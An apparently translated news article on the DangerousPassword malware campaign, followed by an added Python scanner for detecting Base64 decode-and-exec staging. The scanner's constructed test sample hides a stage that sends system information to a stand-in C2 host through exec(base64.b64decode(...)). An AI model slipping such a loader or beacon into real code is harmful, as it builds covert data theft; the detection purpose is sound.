The campaign known as DangerousPassword is spreading rapidly online and is causing considerable concern among professionals and ordinary users alike.
The attack targets all the major desktop platforms on the market, Windows, macOS and Linux, through malware written in Python and Node.js.
The attackers trick users into downloading and running a malicious file, builder.py, presented as a tool for handling QR codes. Once run, it turns out to be the Python malware mentioned above, which harvests information from the infected system and transmits it to a C2 server.
On Windows, after sending the system information, the malware downloads one or more MSI files from an external source. One of these MSI files collects device information, while the other downloads an additional DLL (deobj.dll) and injects it into rdpclip.exe, a legitimate Windows program, so that the malicious code runs under the name of a trusted process.
DangerousPassword: the risks associated with Python and Node.js malware
On macOS and Linux, once the Python malware is on the device, the Base64-encoded strings embedded in it are decoded and executed as Python code. After transmitting the system details to the C2 server, the malware downloads PythonHTTPBackdoor. In some cases the researchers also observed the attack infecting devices with another piece of malware, JokerSpy.
Alongside the Python malware, DangerousPassword sometimes also installs other malicious files, such as route.js and request.js. This Node.js malware follows an attack flow similar to that of its Python counterpart.
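The "decode an embedded Base64 string and execute it" staging step described above is something a defender can hunt for in a suspicious script before running it. The following scanner is an added example written for this page; it is not code from the original article, from JPCERT, or from the malware itself. It parses a Python file with the standard ast module and flags two things: an exec()/eval() call whose argument comes straight out of a Base64-family decoder, and any long Base64 literal that decodes to Python source, from which it also pulls URLs as candidate C2 indicators. The sample "QR code helper" and its hidden stage are constructed for the demonstration; the host name uses the reserved .invalid top-level domain and is not a real indicator.

```python
"""Heuristic static scanner for the Base64 decode-and-exec staging pattern.

Added example, not code from the original article or from the JPCERT report.
It flags Python source that (a) passes the result of a Base64 decoder straight
into exec()/eval() and (b) embeds a long Base64 string that decodes to Python
code, then pulls any URLs out of the decoded stage as candidate C2 indicators.
"""
import ast
import base64
import binascii
import re

EXEC_LIKE = {"exec", "eval"}
DECODERS = {"b64decode", "b32decode", "b16decode", "a85decode", "b85decode"}
B64_TOKEN = re.compile(r"[A-Za-z0-9+/=]{40,}")   # one unbroken blob, no whitespace
URL_RE = re.compile(r"https?://[^\s\"']+")


def _call_name(node):
    """Last component of a call target: exec(...) -> 'exec', base64.b64decode(...) -> 'b64decode'."""
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return ""


def _decode_blob(text):
    """Return the decoded bytes if `text` is a single long Base64 token, else None."""
    if B64_TOKEN.fullmatch(text) is None:
        return None
    try:
        return base64.b64decode(text, validate=True)
    except (binascii.Error, ValueError):
        return None


def _decoded_python_source(blob):
    """Return the blob as text if it parses as Python and imports or calls something, else None."""
    try:
        text = blob.decode("utf-8")
        tree = ast.parse(text)
    except (UnicodeDecodeError, SyntaxError, ValueError):
        return None
    if any(isinstance(n, (ast.Import, ast.ImportFrom, ast.Call)) for n in ast.walk(tree)):
        return text
    return None


def scan_source(src):
    """Scan one Python source text; return a list of (line, kind, detail) sorted by line."""
    findings = []
    tree = ast.parse(src)
    for node in ast.walk(tree):
        # (a) exec/eval whose argument subtree contains a Base64-family decoder call
        if isinstance(node, ast.Call) and _call_name(node) in EXEC_LIKE:
            decoders = [n for n in ast.walk(node)
                        if isinstance(n, ast.Call) and _call_name(n) in DECODERS]
            if decoders:
                findings.append((node.lineno, "decode_and_exec",
                                 f"{_call_name(node)}({_call_name(decoders[0])}(...))"))
        # (b) long Base64 literal that decodes to Python source; harvest URLs from it
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            blob = _decode_blob(node.value)
            stage = _decoded_python_source(blob) if blob is not None else None
            if stage is not None:
                findings.append((node.lineno, "embedded_python_payload", stage.splitlines()[0]))
                for url in URL_RE.findall(stage):
                    findings.append((node.lineno, "payload_url", url))
    return sorted(findings)


# --- constructed sample input (not a real DangerousPassword artifact) ---
# Stand-in for the decoded stage: collects uname() and posts it to a fake C2.
# The host uses the reserved .invalid TLD, so it is not a real indicator.
PAYLOAD_SRC = (
    "import platform, urllib.request\n"
    "info = platform.uname()\n"
    "urllib.request.urlopen('http://c2.example.invalid/beacon', data=str(info).encode())\n"
)
# A "QR code helper" that hides the stage above in a Base64 string and exec()s it.
SAMPLE_SRC = (
    "import base64\n"
    "def read_qr(path):\n"
    "    return open(path, 'rb').read()\n"
    "_blob = '%s'\n"
    "exec(base64.b64decode(_blob))\n"
) % base64.b64encode(PAYLOAD_SRC.encode()).decode()
# Benign control: a long docstring and a short decoded literal must not fire.
BENIGN_SRC = (
    '"""Reads a QR code image and returns its raw bytes for the caller to decode."""\n'
    "import base64\n"
    "print(base64.b64decode('aGVsbG8='))\n"
)

if __name__ == "__main__":
    for line, kind, detail in scan_source(SAMPLE_SRC):
        print(f"line {line}: {kind}: {detail}")
    print("benign findings:", scan_source(BENIGN_SRC))
```

Running the block on the constructed sample reports the embedded payload and its beacon URL on the line holding the Base64 literal and the exec(b64decode(...)) chain on the line below it, while the benign control produces no findings. It is a heuristic: a stage split across several literals, built by string concatenation, or unpacked by a custom decoder will slip past it, so treat a hit as a reason to look closer rather than a verdict, and treat a clean result as nothing more than the absence of this one pattern.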
To avoid becoming one of this campaign's many victims, it is important to prevent infection in the first place.
Great caution is essential when clicking on suspicious links and, even more so, when downloading files, executable or otherwise; since the lure in this campaign is a Python script rather than a binary, that caution applies to source files as well. Finally, to counter DangerousPassword it is very useful to deploy dedicated protection tools such as antivirus software, firewalls and the like.